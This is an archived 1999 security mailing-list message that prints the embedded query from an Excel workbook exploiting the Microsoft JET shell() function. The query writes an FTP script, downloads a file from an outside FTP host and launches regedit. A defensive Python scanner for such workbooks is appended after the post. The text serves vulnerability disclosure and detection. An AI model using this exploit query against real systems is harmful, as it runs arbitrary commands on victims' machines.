Microsoft JET/Office Vulnerability Exploit

From: Ollie Whitehouse (ollieat_private)
Date: Thu Aug 19 1999 - 04:27:01 PDT

    All,
    
    Russ Cooper:
    > Well, with the module password protected it seems clear you're not out
    > to get that critique very quickly. Maybe if you'd let someone know the
    > details we'd be able to answer you. As it is, we're simply left with
    > what appears to be the same exploit.
    
    Below is the code from the workbook:
    
    [Code]
    SELECT shell('command.com /C echo user anonymous
    yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
    c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
    ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
    
    [RAW Dump from the workbook from the SF web site]
    SELECT shell('command.com /C echo user anonymous
    yeahat_private'+chr$(10)+'get .welcome c:\ftptest.txt'+chr$(10)+'quit  >
    c:\jexploit.log'), shell('command.com /C ftp -s:C:\jexploit.log -n
    ftp.aol.c..D.A..om',1), shell('command.com /C regedit',1)..FROM config.sys
    config.......DBQ=C:\;DefaultDir=C:\;Driver={Microsoft Text Driver (*.txt;
    *.csv)};DriverId=27;Extensions=asc,csv,ini,tab,txt;FIL=text;Implic..}.z..itC
    ommitSync=Yes;MaxBufferSize=512;MaxScanRows=25;PageTimeout=5;SafeTransaction
    s=0;Threads=3;UID=admin;UserCommitSync=Yes
    
    That will be enough information for people who want to create their own
    working demo.
    
    Ollie
    <%
    Ollie Whitehouse
    I.T Co-Ordinator - Delphis Consulting
    VOX : +44 (0)207 916 0200 (Switchboard)
    FAX : +44 (0)207 916 1620 (Main)
    FAX : +44 (0)870 0881837 (FAX - E-Mail)
    PGP : http://www.ombs.demon.co.uk/pgp.txt
    Tag : Who needs Windows2000 when you have OS/2?
    %>
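
A defensive check for the pattern in the message above, as an added example that is not part of the original post: it scans a workbook's raw bytes for an embedded query that calls shell() and for the ODBC driver named in its connection string. The function names and the sample bytes are constructed for illustration; the sample interleaves non-printable bytes inside strings the way the raw dump does.

```python
import re

# Jet expression call inside embedded query text. Only shell() appears on the
# page, so that is the only function matched here. Captures the first quoted
# literal of the argument (the page's query concatenates more with chr$(10)).
SHELL_CALL = re.compile(rb"\bshell\s*\(\s*'([^']*)'", re.IGNORECASE)
# ODBC driver name from a connection string such as Driver={...}.
ODBC_DRIVER = re.compile(rb"Driver=\{([^}]*)\}", re.IGNORECASE)


def printable_only(data: bytes) -> bytes:
    """Drop bytes outside 0x20-0x7e so strings split by record bytes rejoin."""
    return bytes(b for b in data if 0x20 <= b <= 0x7E)


def scan_workbook(data: bytes) -> dict:
    """Report shell() calls and ODBC drivers found in raw workbook bytes."""
    text = printable_only(data)
    commands = [m.group(1).decode("ascii") for m in SHELL_CALL.finditer(text)]
    drivers = [m.group(1).decode("ascii") for m in ODBC_DRIVER.finditer(text)]
    return {
        "shell_commands": commands,
        "odbc_drivers": drivers,
        "suspicious": bool(commands),
    }


# Constructed sample: query text taken from the post, with non-printable
# bytes inserted around and inside the strings. Not a real workbook.
SAMPLE = (
    b"\x09\x08\x10\x00"
    b"SELECT shell('command.com /C regedit',1)\x00\x00FROM config.sys"
    + b"\x00" * 7
    + b"DBQ=C:\\;Driver={Microsoft Text Dri\x00\x01ver (*.txt; *.csv)};UID=admin"
)

if __name__ == "__main__":
    for key, value in scan_workbook(SAMPLE).items():
        print(f"{key}: {value}")
```

The dump in the post also shows printable bytes ("D", "A") inside a split run, and a keyword split that way will not rejoin after stripping, so a clean result from this scan is inconclusive rather than proof of absence.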
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:57:24 PDT